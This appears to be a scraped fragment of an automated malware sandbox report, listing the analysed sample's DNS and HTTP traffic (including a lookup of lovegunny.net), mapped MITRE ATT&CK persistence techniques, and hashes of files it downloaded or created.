GET https://tse1.mm.bing.net/th?id=OADD2.10239360422982_1TJDRH7G9FF9FQQY2&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200
-
72 B 158 B 1 1
DNS Request
209.205.72.20.in-addr.arpa
-
59 B 75 B 1 1
DNS Request
lovegunny.net
DNS Response
103.27.237.159
-
72 B 158 B 1 1
DNS Request
140.32.126.40.in-addr.arpa
-
73 B 123 B 1 1
DNS Request
159.237.27.103.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
56.163.245.4.in-addr.arpa
-
70 B 144 B 1 1
DNS Request
18.31.95.13.in-addr.arpa
-
72 B 132 B 1 1
DNS Request
99.209.201.84.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
77.190.18.2.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
205.47.74.20.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.210.232.199.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
11.227.111.52.in-addr.arpa
-
62 B 170 B 1 1
DNS Request
tse1.mm.bing.net
DNS Response
150.171.28.10150.171.27.10
-
72 B 158 B 1 1
DNS Request
10.28.171.150.in-addr.arpa
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
80KB
MD505644c696c4cfcd50af83ac4e2f1ff50
SHA1b6cc01ee14e43facaccf9bfa7007481bb1e04751
SHA256302c57e4f1a9344d620ff8a09419fb15e0b9b35ae94f6e1b2b4c50d5788830a7
SHA512ae9b804d75feb586909a9b030fc9cdbeb1f6c733d8ba43cd3b099e41993bb9eb6399f896725c810a0e1827ded330295cfe88626ec6a15935a13c5185dd7a4fab
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82